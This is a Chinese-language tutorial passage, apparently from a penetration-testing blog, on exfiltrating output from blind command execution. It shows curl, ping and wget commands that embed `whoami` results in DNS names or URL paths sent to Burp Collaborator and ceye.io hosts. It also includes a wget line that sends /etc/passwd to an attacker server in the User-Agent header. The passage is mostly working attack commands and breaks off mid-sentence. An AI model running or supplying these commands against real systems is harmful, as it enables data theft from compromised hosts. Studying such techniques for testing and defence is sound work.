好了,不卖关子了,我们接下来开讲
第一种命令格式
通过DNS记录查看是否执行(最好执行两次),ping走的是DNS协议
curl `whoami`.wyyysg1fi9svq8zgf0g11dz80z6pue.burpcollaborator.net
DNS,http中有回显
第二种命令格式
curl http://n7vp17a6r01mzz87orpsa48z9qfh36.burpcollaborator.net/`whoami`
DNS、记录中无回显,http中有回显
3.第三种命令执行格式
linux系统:
ping `whoami`.ip.port.ttq72fceob0yxwq9342c4yuo2f85wu.burpcollaborator.net
windows系统:
ping %whoami%.ip.port.ttq72fceob0yxwq9342c4yuo2f85wu.burpcollaborator.net
命令执行无回显
经常在拿下shell的时候碰到命令执行无回显的情况,因此为了解决命令执行无回显时,可以借助DNS管道解析来让命令回显
linux利用
1.http传输
wget传输
使用wget将命令回显信息通过包头数据字符串User-Agent传输至攻击服务器上,xargs echo-n代表去掉各个分隔符,换行符等符号输出
wget --header="User-Agent: $(cat /etc/passwd | xargs echo–n)" http://6rych16irk3064ztjoo9ufasuj0do2.burpcollaborator.net
curl传输
通过curl远程命令执行RCE去对靶机执行以下命令
#通过http记录查看是否执行(最好执行两次),curl走http协议
curl http://ip.port.XXXXXX.ceye.io/`whoami`
curl `whoami`.XXXXXX.ceye.io
如果回显信息不全,可以使用如下结合sed命令令回显完整,但其实也不是全的